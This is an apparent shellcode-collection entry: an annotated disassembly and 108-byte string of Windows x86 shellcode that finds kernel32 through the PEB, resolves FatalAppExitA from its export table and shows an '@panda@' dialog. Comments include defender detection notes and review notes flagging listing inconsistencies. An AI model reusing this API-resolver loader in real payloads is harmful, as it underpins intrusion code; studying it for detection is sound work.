
shellcode搜集


好像所有 Windows 版本都行：利用 FatalAppExit 函数弹出对话框，然后终止程序；shellcode 串很短。

; 32-bit x86, position-independent.  Locates kernel32 through the PEB loader
; list, scans kernel32's export name table for a name matching "Fata????Exit",
; resolves its address and calls it with a string assembled on the stack.
;
; Register roles:
;   edx = loader-list cursor, later export-directory VA
;   eax = kernel32 image base (added to every RVA below)
;   edi = current export-table array VA, finally the resolved function VA
;   ebp = export-name index, then the ordinal read from AddressOfNameOrdinals
;   esi = module-name / export-name string pointer
;   ecx = pointer to the stack-built message string
;
; NOTE(review): the byte dump below starts with 31 D2 (xor edx,edx) at
; 00406030, which this listing omits.  Without it, "mov dl,0x30" leaves the
; upper 24 bits of edx undefined and the fs:[edx] read is wrong.
;
; Defender notes: the fs:[0x30] (TEB -> PEB) read followed by hand-rolled
; PE export parsing (e_lfanew, DataDirectory[0], AddressOfNames /
; AddressOfNameOrdinals / AddressOfFunctions) and a string built from
; immediates on the stack are the classic markers of this API-resolver
; pattern; the dump is 0x00-free (see the 108-byte string below), which is
; why the terminator is patched in at runtime rather than embedded.
00406032    B2 30           mov dl,0x30                                ; edx = 0x30 (edx was zeroed just before; see note above)
00406034    64:8B12         mov edx,dword ptr fs:[edx]                 ; edx = PEB (TEB+0x30)
00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; edx = PEB->Ldr (_PEB_LDR_DATA)
0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; edx = first entry of InInitializationOrderModuleList
; Loop head.  edx points at an entry's InInitializationOrderLinks, so the
; fields below are read relative to that link, not to the entry start.
0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; eax = module image base (used as PE base at 0040604B); author labelled this InMemoryOrderLinks, the usage says DllBase
00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; esi = module name buffer (UTF-16); author labelled it FullDllName -- NOTE(review): offset looks like BaseDllName.Buffer, confirm against the 32-bit LDR_DATA_TABLE_ENTRY layout
00406043    8B12            mov edx,dword ptr ds:[edx]                 ; edx = next list entry (Flink) for the following iteration
00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33             ; UTF-16 char 6 == '3'  -> "kernel32.dll" (only this one byte is compared)
00406049  ^ 75 F2           jnz XlastTest.0040603D                     ; not kernel32: examine the next module
; eax = kernel32 base from here on.
0040604B    89C7            mov edi,eax                                ; edi = image base
0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; edi += e_lfanew -> IMAGE_NT_HEADERS
00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; edx = export directory RVA (DataDirectory[0].VirtualAddress)
00406053    01C2            add edx,eax                                ; edx = export directory VA
00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; edi = AddressOfNames RVA (ENT)
00406058    01C7            add edi,eax                                ; edi = AddressOfNames VA
0040605A    31ED            xor ebp,ebp                                ; ebp = name index 0
; Name-scan loop.  Invariant at 0040605C: ebp = index of the name about to be read.
0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]           ; esi = AddressOfNames[ebp] (RVA)
0040605F    01C6            add esi,eax                                ; esi = name string VA
00406061    45              inc ebp                                    ; ebp = (index of the name just loaded) + 1
00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; name[0..3] == "Fata" (little-endian immediate)
00406068  ^ 75 F2           jnz XlastTest.0040605C                     ; no match: next name
0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; name[8..11] == "Exit"; bytes 4..7 and the A/W suffix are not checked, so the first name in table order wins (the name table is sorted, so presumably FatalAppExitA precedes FatalAppExitW)
00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; no match: next name.  (Author: FatalAppExit shows a message box and terminates the application once the box is closed.)
; Match found.  NOTE(review): ebp is matchIndex+1 here (see inc ebp above),
; so the word load below reads the ordinal of the *following* name; the -0x4
; at 00406081 undoes that only when consecutive names carry consecutive
; ordinals -- confirm this holds for the kernel32 builds listed below.
00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; edi = AddressOfNameOrdinals RVA
00406076    01C7            add edi,eax                                ; edi = AddressOfNameOrdinals VA
00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; bp = ordinal[ebp] (16-bit; upper half of ebp is still 0)
0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; edi = AddressOfFunctions RVA (EAT)
0040607F    01C7            add edi,eax                                ; edi = AddressOfFunctions VA
00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; edi = AddressOfFunctions[ebp-1] (RVA)
00406085    01C7            add edi,eax                                ; edi = VA of FatalAppExitA
; Build the NUL-terminated message text on the stack without a 0x00 in the code.
00406087    68 64614001     push 0x1406164                             ; bytes 64 61 40 01 = "da@\x01"
; NOTE(review): the address jumps from 0040608C to 00406096 (10 bytes for a
; 5-byte push); the byte dump below has these two instructions adjacent.
0040608C    68 4070616E     push 0x6E617040                            ; bytes 40 70 61 6E = "@pan"  -> stack now reads "@panda@\x01"
00406096    89E1            mov ecx,esp                                ; ecx = &"@panda@\x01"
00406098    FE49 07         dec byte ptr ds:[ecx+0x7]                  ; 0x01 -> 0x00: terminate the string
0040609B    31C0            xor eax,eax                                ; eax = 0 (uAction)
0040609D    51              push ecx                                   ; lpMessageText
0040609E    50              push eax                                   ; uAction = 0
0040609F    FFD7            call edi                                   ; FatalAppExitA(0, "@panda@"); stdcall, callee cleans the two arguments; not expected to return

"\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B"
"\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20"
"\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E"
"\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01"
"\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE"
"\x49\x07\x31\xC0\x51\x50\xFF\xD7"
//108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3